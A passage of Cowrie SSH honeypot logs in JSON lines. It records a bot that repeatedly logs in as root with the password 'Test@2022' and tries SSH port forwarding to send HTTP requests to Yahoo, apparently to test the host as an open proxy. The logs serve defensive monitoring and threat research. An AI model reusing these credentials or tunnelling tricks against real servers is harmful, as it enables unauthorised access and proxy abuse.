57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.686550Z","src_ip":"213.209.150.239","session":"77b0879e9cab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.921340Z","src_ip":"213.209.150.239","session":"77b0879e9cab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":31153,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:31153","sensor":"my-vps","timestamp":"2025-08-26T00:55:59.969701Z","session":"77b0879e9cab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.016927Z","src_ip":"213.209.150.239","session":"77b0879e9cab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2222,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2222","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.162182Z","session":"77b0879e9cab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.209841Z","src_ip":"213.209.150.239","session":"77b0879e9cab"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.257709Z","src_ip":"213.209.150.239","session":"77b0879e9cab"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54282,"dst_ip":"1.2.3.4","dst_port":22,"session":"4885804a9adc","protocol":"ssh","message":"New connection: 213.209.150.239:54282 (1.2.3.4:22) [session: 4885804a9adc]","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.313420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.314072Z","src_ip":"213.209.150.239","session":"4885804a9adc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.371118Z","src_ip":"213.209.150.239","session":"4885804a9adc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.654168Z","src_ip":"213.209.150.239","session":"4885804a9adc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":32574,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:32574","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.712718Z","session":"4885804a9adc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.769552Z","src_ip":"213.209.150.239","session":"4885804a9adc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":952,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:952","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.923183Z","session":"4885804a9adc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:00.979980Z","src_ip":"213.209.150.239","session":"4885804a9adc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.038781Z","src_ip":"213.209.150.239","session":"4885804a9adc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54343,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecb83083556f","protocol":"ssh","message":"New connection: 213.209.150.239:54343 (1.2.3.4:22) [session: ecb83083556f]","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.093905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.094772Z","src_ip":"213.209.150.239","session":"ecb83083556f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.151621Z","src_ip":"213.209.150.239","session":"ecb83083556f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.434943Z","src_ip":"213.209.150.239","session":"ecb83083556f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":8472,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:8472","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.492528Z","session":"ecb83083556f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.549454Z","src_ip":"213.209.150.239","session":"ecb83083556f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":7129,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7129","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.703442Z","session":"ecb83083556f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.760514Z","src_ip":"213.209.150.239","session":"ecb83083556f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.818024Z","src_ip":"213.209.150.239","session":"ecb83083556f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54394,"dst_ip":"1.2.3.4","dst_port":22,"session":"a216cf402252","protocol":"ssh","message":"New connection: 213.209.150.239:54394 (1.2.3.4:22) [session: a216cf402252]","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.864618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.865605Z","src_ip":"213.209.150.239","session":"a216cf402252"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:01.912969Z","src_ip":"213.209.150.239","session":"a216cf402252"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.148817Z","src_ip":"213.209.150.239","session":"a216cf402252"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":27256,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:27256","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.198049Z","session":"a216cf402252"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.245660Z","src_ip":"213.209.150.239","session":"a216cf402252"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":22327,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22327","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.381850Z","session":"a216cf402252"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.429220Z","src_ip":"213.209.150.239","session":"a216cf402252"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.477454Z","src_ip":"213.209.150.239","session":"a216cf402252"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54431,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e24564f7104","protocol":"ssh","message":"New connection: 213.209.150.239:54431 (1.2.3.4:22) [session: 4e24564f7104]","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.533281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.534192Z","src_ip":"213.209.150.239","session":"4e24564f7104"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.590964Z","src_ip":"213.209.150.239","session":"4e24564f7104"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.873723Z","src_ip":"213.209.150.239","session":"4e24564f7104"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15583,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15583","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.931964Z","session":"4e24564f7104"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:02.989516Z","src_ip":"213.209.150.239","session":"4e24564f7104"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":7814,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7814","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.143267Z","session":"4e24564f7104"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.200294Z","src_ip":"213.209.150.239","session":"4e24564f7104"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.257726Z","src_ip":"213.209.150.239","session":"4e24564f7104"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":54482,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c6703cbfed3","protocol":"ssh","message":"New connection: 213.209.150.239:54482 (1.2.3.4:22) [session: 6c6703cbfed3]","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.313584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.315073Z","src_ip":"213.209.150.239","session":"6c6703cbfed3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.371881Z","src_ip":"213.209.150.239","session":"6c6703cbfed3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.654431Z","src_ip":"213.209.150.239","session":"6c6703cbfed3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":6828,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6828","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.711992Z","session":"6c6703cbfed3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.768804Z","src_ip":"213.209.150.239","session":"6c6703cbfed3"}
{"eventid":"cowrie.session.closed","duration":"15.0","message":"Connection lost after 15.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.784594Z","src_ip":"212.227.235.229","session":"131c7d825f25"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56674,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddec7d14b305","protocol":"ssh","message":"New connection: 217.72.205.35:56674 (1.2.3.4:22) [session: ddec7d14b305]","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.792006Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.793691Z","src_ip":"217.72.205.35","session":"ddec7d14b305"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":31795,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:31795","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.923427Z","session":"6c6703cbfed3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:03.980160Z","src_ip":"213.209.150.239","session":"6c6703cbfed3"}
